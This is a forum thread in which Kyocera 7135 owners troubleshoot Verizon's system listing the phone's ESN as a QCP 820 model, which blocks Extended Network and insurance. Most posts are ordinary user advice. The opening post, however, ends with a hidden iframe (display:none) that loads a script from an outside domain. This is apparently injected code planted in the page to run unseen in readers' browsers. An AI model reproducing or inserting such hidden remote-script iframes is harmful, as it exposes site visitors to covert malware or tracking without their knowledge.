+ Reply to Thread

Help - Problem with ESN Issue

I've had the 7135 for about a month and have had no major problems. I was trying to add EN and Verizon said the phone was not compatable. The problem relates to the ESN. When the rep checked the ESN into the system (the ESN and the ESN HEX do match and the numbers Verizion has are correct) it comes up as a Kyocera QCP 820 Dual Mode phone. Has this happened to anyone else and if so what did you do? It's not only an EN issue, but also an asurion issue (assuming they cover the 7135).<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Well, apparantly others here have done without this problem. Have you tried calling back and speaking to another rep?

Originally posted by Rambler
    Well, apparantly others here have done without this problem. Have you tried calling back and speaking to another rep?
    I have spoken to about 10 reps. I guess the questions is whether anyone else has the same problem. It is only an issue if the ESN ties to the wrong phone model. If the ESN ties to the 7135 (as it should) and not the 820, it would not be a problem for Verizon.

Originally posted by RMSko
    I have spoken to about 10 reps. I guess the questions is whether anyone else has the same problem. It is only an issue if the ESN ties to the wrong phone model. If the ESN ties to the 7135 (as it should) and not the 820, it would not be a problem for Verizon.
    I had this problem when I called to activate my 7135 as well. The sales rep I spoke to had to go talk to someone in tech support who showed him how to proceed with setting it up and activating it in their system and there were no problems after that.

I'd recommend trying again and see if you can have the person contact tech support for assistance. If that fails, PM me and I'll see if I can find the # for the sales rep I spoke to a little over 2 weeks ago - as I mentioned, he's already dealt with this once, so he should know how to proceed and be able to help you.

Hope this helps...

- Rob

Originally posted by TrebleAhead
    I had this problem when I called to activate my 7135 as well. The sales rep I spoke to had to go talk to someone in tech support who showed him how to proceed with setting it up and activating it in their system and there were no problems after that.

I'd recommend trying again and see if you can have the person contact tech support for assistance. If that fails, PM me and I'll see if I can find the # for the sales rep I spoke to a little over 2 weeks ago - as I mentioned, he's already dealt with this once, so he should know how to proceed and be able to help you.

Hope this helps...

- Rob
    I guess I'll be able to work through it for EN, but are all the 7135 ESN's reflected as 820's? If yes, what happens if someone loses a phone and makes a claim on Asurion? You would never have been in the system as a 7135 owner. Is there anyone whose ESN matches up in the data base as a 7135?

Originally posted by RMSko
    I guess I'll be able to work through it for EN, but are all the 7135 ESN's reflected as 820's? If yes, what happens if someone loses a phone and makes a claim on Asurion? You would never have been in the system as a 7135 owner. Is there anyone whose ESN matches up in the data base as a 7135?
    Haven't looked into that yet. Been meaning to contact the sales rep I'd worked with to look into insuring my phone as well as to look into the new EN plan(s), but haven't had a chance to yet. I'll let you know my findings when I do, hopefully tomorrow or Tuesday.

Re: Help - Problem with ESN Issue

I called VZW to make a change and ask some questions. My phone was listed as a 820 Dual Mode phone as well. I've had no problems but I don't have EN in my area yet. The rep said that he changed it in their system to a 7135.

I don't know if there will be a problem should I eventually get EN.

Re: Re: Help - Problem with ESN Issue

Originally posted by Beryl
    The rep said that he changed it in their system to a 7135. .
    They told me the same thing, except it's actually not possible. After talking to alot of the reps I have learned that they will not be able to list it in the system as a 7135 until it's released. What you should do is make sure the rep puts some notes in your file that indicate it is a 7135, unless you don't have Asurion insurance, then it doesn't matter as much.

Tell them it's a 2235.

I-300 Novice
    I don't know if it will help you any, but I ran into road block after road block getting my ESN service activated with Verizon.

I finally got on the phone with Tobian Hawkins at 866-658-8823, Ext. 3327 and he went out of his way to get a workaround in place to activate the service.

Based on all of the idiots I have talked to at Verizon in trying to get my 7135 activated, this guy should be president of the company.

Hope he can help you.
    Ahmed V. Ismail
    A Smartphone Addict

Originally posted by PHCismail
    I don't know if it will help you any, but I ran into road block after road block getting my ESN service activated with Verizon.

I finally got on the phone with Tobian Hawkins at 866-658-8823, Ext. 3327 and he went out of his way to get a workaround in place to activate the service.

Based on all of the idiots I have talked to at Verizon in trying to get my 7135 activated, this guy should be president of the company.

Hope he can help you.
    Great info. Thanks!

Originally posted by HoTSynC
    Tell them it's a 2235.
    Yes, it supports EN.

@ PHCismail
    Was this the workaround your guy implemented?